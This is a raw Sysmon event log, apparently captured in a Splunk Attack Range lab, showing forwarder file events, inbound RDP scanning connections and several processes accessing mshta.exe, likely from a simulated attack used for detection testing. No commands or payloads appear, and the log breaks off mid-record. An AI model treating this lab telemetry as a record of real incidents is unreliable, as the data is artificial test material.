23542300x800000000000000081865Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:22.606{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EDAB568B932B1A0EB26E8C11D31A8988,SHA256=5E11E0BAD781D709F5982D4BECC04B1C22AB9A67EB59ED33C798F3A11141E9FA,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050773Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:20.750{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-50804-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050772Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:22.475{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F62601C5887F420DF8E8634F53EC080,SHA256=5005ACAA07F844BBF7E02C93C05EB511066EA75A1D9751BFE23DEF57849EF474,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050771Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:22.084{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=45B4978305B395563D1EA9411A97D17B,SHA256=B04B3515DD5E24A5BA242D050BAF51A612039B7030D55735C8A53B4432220C73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081872Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:23.621{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7131D36E2B282157D5AC935F3F2D201,SHA256=082AFCC946313350C6CB03C6A76ADD89D89E4B689BEA23DBD549B06A0DB2D8DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081871Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:23.403{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=25C409DB2FF9EE1E819FB2CF771AB05E,SHA256=AE30E132E3053718D49539EBFB64C468E1663FFD7A6D295827DCCAEAA7254353,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081870Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:23.356{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=25C409DB2FF9EE1E819FB2CF771AB05E,SHA256=AE30E132E3053718D49539EBFB64C468E1663FFD7A6D295827DCCAEAA7254353,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081869Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:23.356{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=DB1E89278CC6518B9EA93DB29930BD4C,SHA256=017193C8E624D8BFC51F2CF141E78EC1B670B03F2DB6CC1843CA8D263D04EED0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081868Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:23.325{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=64269C4E95DE9CA99D928B7E6D6B1D3B,SHA256=5151741A8DE9DF43E3DE906E11BA020C879844A37CA01149B250283BFB27225C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050780Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:22.310{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-52281-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050779Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:22.203{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-49322-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050778Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:21.738{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com60626-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050777Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:21.106{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com62756-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050776Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:23.819{85C0FFC9-B85C-607E-9700-00000000BB01}3076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=F985E1E51BD4FEB45E4931E1523E80EA,SHA256=E168C793E8F8BB7D1EAC66F2B963AAC5E0DD0FE2CCEBAB9CCFC61E8C70CE4293,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050775Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:23.491{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0249243D9EEABAD061F3DD5B016885D3,SHA256=8ACED48A94C8564B6D5BAB389A8D97934BC1D1AB0AE86DCEE6D00F16F0CF959B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050774Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:23.303{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B6FD919151DD736E47CF4DBEB858B084,SHA256=6EB8B08716A2F924D89ABAE6480F8E965354FB09D63A2B2D3E49414522F8AE1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081879Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:24.637{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10A1B749C05C64D16EC3E23D366631EE,SHA256=F035D6C2C90C80F23E42058F5E99F7136CC6D41F792F68ED7E77A5A81BAD02A6,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081878Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:23.317{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com50411-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000081877Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:22.858{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-14063-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000081876Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:22.789{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-16783-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000081875Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:24.465{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0F416E1F5406CAFCFF1E0A03917F452E,SHA256=B95D1A968B19DABC77282C36C3D39BCC9EFE3B9B3C0A573D74F1738E85F20EB8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081874Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:24.418{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=6A7FFAC5A44FDABEA2A5286CB21D8AD0,SHA256=FD1738A31C5CC30EEA8EF757D3620EF1C01EDB31F7F7D5DEECBD7699E15CB068,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081873Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:24.418{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=979F592C39E2FBB54945111C030AF686,SHA256=DB5CE800751DAC20025469D6E69E7A3BCD392935909DF4BFC66AA5928FC09EE3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050782Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:24.866{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DF5DA94F10DF30B40A9CEEC68D77FC3D,SHA256=665F17A96D8CC8AC600C29685B82EE53E5B42D3220A0A6BD7CDBA8387A389190,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050781Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:24.538{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D16E0DD10D577DCE0DFFE1AA07EE486A,SHA256=452BEEA44F7471924B2524AE2B72823D7F216C519F9DB3C1BDEAA0B5E76F6306,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081884Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:25.981{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E8696EDD9607FD4587538144C6F5D5BA,SHA256=B88F538C41D4BCF4E1D49A8A19207E49F0F3FF5750CB8A2BAFD92DF731530D9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081883Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:25.653{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98EF147B4533BD756FD35FE7EE50B90E,SHA256=8B9D32561B452EC5F9F443900ADF6479BB0B88B0DB6FCFB5AB28ECD8D56B8943,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081882Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:25.653{A7A01FEF-B626-607E-1000-00000000BB01}1168NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=29B8B3C521D06DB655F98C1DC1BC8541,SHA256=5C53CAF1BEC1C1F5F8B576C5FE3230191E61AAA3EAC2C5810F76A44EBB4AC129,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081881Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:24.289{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-18145-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000081880Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:24.124{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57646-false10.0.1.12-8000- 23542300x800000000000000050785Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:25.569{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=426617D0A2A838EBA4303260712D9633,SHA256=C19816CB3B989FCD7CA8DE4D105195E043027D5747E1598ECA06A140A64D74BD,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050784Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:23.409{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52549-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 354300x800000000000000050783Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:22.659{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52548-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000081885Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:26.746{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DAAFBE351D291BCEA5D417F1C5D35245,SHA256=C1F2ECD42AA13C010CC17A000D5C7CE256E9093F80158F3C438A4948F8855C9A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050787Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:26.589{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A1C1355EB01609B87DACB69EEE45BDD,SHA256=EBD9EB4837BDE1CA8607A620D5D663CAF8F110219CDC0E97808BEEE543AD793E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050786Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:26.495{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8B8A73496F4359185C930FC8AFB28D54,SHA256=DF84E5EFA1952233FD6140D6718794A3135E0043DA414F7E8B03C37EC95DE344,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081908Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:27.949{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC4F-607E-6A0F-00000000BB01}7016C:\Windows\SYSTEM32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081907Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:27.949{A7A01FEF-C0A6-607E-7B05-00000000BB01}18804408C:\Windows\system32\taskhostw.exe{A7A01FEF-EC4F-607E-6A0F-00000000BB01}7016C:\Windows\SYSTEM32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081906Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:27.949{A7A01FEF-C0A6-607E-7B05-00000000BB01}18804408C:\Windows\system32\taskhostw.exe{A7A01FEF-EC4F-607E-6A0F-00000000BB01}7016C:\Windows\SYSTEM32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081905Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:27.949{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EC4F-607E-6A0F-00000000BB01}7016C:\Windows\SYSTEM32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+628b0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081904Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:27.934{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EC4F-607E-6A0F-00000000BB01}7016C:\Windows\SYSTEM32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bd0|C:\Windows\System32\SHELL32.dll+6286c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081903Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:27.934{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EC4F-607E-6A0F-00000000BB01}7016C:\Windows\SYSTEM32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081902Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:27.934{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EC4F-607E-6A0F-00000000BB01}7016C:\Windows\SYSTEM32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000081901Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:26.765{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com52905-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000081900Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:25.849{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-19505-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000081899Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:27.824{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A378B07FAEAFE1D06ED51862C1A9B84B,SHA256=B4D24655F2A11446578D5A8EF3B44578DBAF5A965A53AEEE1CE9D1DF096674F7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081898Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:27.809{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000081897Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:27.778{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B44830B3FD1356994FF1F367C26E6ED1,SHA256=B5E419576E34AA6A708D21CF5DA9EB97537CD4318C303C9A1310755B4E4D473D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081896Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:27.746{A7A01FEF-B624-607E-0B00-00000000BB01}8602976C:\Windows\system32\lsass.exe{A7A01FEF-EC4F-607E-6A0F-00000000BB01}7016C:\Windows\SYSTEM32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081895Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:27.746{A7A01FEF-B624-607E-0B00-00000000BB01}8602976C:\Windows\system32\lsass.exe{A7A01FEF-EC4F-607E-6A0F-00000000BB01}7016C:\Windows\SYSTEM32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081894Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 